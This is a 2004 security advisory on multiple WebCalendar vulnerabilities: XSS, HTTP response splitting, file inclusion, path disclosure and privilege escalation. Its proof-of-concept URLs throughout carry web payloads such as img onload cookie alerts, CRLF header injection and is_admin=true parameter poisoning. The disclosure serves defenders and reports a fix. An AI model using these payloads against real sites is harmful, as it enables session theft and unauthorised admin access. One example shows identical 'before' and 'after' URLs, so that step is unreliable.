Multiple Vulnerabilities in WebCalendar
---------------------------------------------------------------------------
Multiple Vulnerabilities in WebCalendar
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WebCalendar - Web Calendar Application
WebCalendar is a PHP application used to
maintain a calendar for a single user
or an intranet group of users. It can also be
configured as an event calendar.
Web : http://webcalendar.sourceforge.net
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerabilities in various
scripts.
A1. WebCalendar check the <script>any</script>
format of XSS attacks but
doesn't check <img src based attacks. To test the
vulnerabilities you can try
the following POCs:
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
NOTE: Almost any GLOBAL parameter in this script
is vulnerable
B. HTTP Response Splitting Error
B1. Due to a poor input validation in the script
login.php HTTP Response Splitting
attacks are possible. You can try the vulnerability
with the following POC :
http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi
to all
C. Possible code execution
C1. If an attacker is abble to upload a file via ftp or
other system to the web directory
there is a flaw that allows to execute any file in the
web tree. To try the vulnerability
you can try this url :
http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other
Note: Almost this is a full path disclosure.
D. Full Path Disclosure
D1. Because of a poor validation of the parameter
enconded_login in the PHP script
validate.php, there is a vulnerability that shows
the full path of the script in the
web server.
http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login=
(Full Path Disclosure)
E. Admin Privileges
E1. To make various actions you need to be the
administrator of the webcalendar
application but various scripts are vulnerable to
Variable Poisoning attacks.
Privilege escalation is possible using the following
methods :
Example 1 :
You doesn't have permission:
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
But using it yes:
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
Example 2 :
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=
Example 3 :
No permission ->
http://webcalendar.sourceforge.net/demo/upcoming.php
Permission Granted :) ->
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y
Notes
~~~~~
The poor method that uses to protect against XSS
attacks in the script functions.php
is the following :
// This code is a temporary hack to make the
application work when
// register_globals is set to Off in php.ini (the
default setting in
// PHP 4.2.0 and after).
if ( ! empty ( $HTTP_GET_VARS ) ) {
while (list($key, $val) =
@each($HTTP_GET_VARS)) {
// don't allow anything to have <script> in it...
if ( ! is_array ( $val ) ) {
if ( preg_match ( "/<\s*script/i", $val ) ) {
echo "Security violation!"; exit;
}
}
Is very easy to by pass these basic security checks
by using Unicode encoded strings,
or using any other valid XSS attack, such as <img
src attacks.
More Notes
~~~~~~~~~~
The developers (in special Jeff Hoover) of
WebCalendar has been demostrated
seriousness with the fixes and responses about
these errors.
The fix:
~~~~~~~~
The problems has been fixed in the CVS repository.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its
demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of
using the information or demonstrations provided
in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es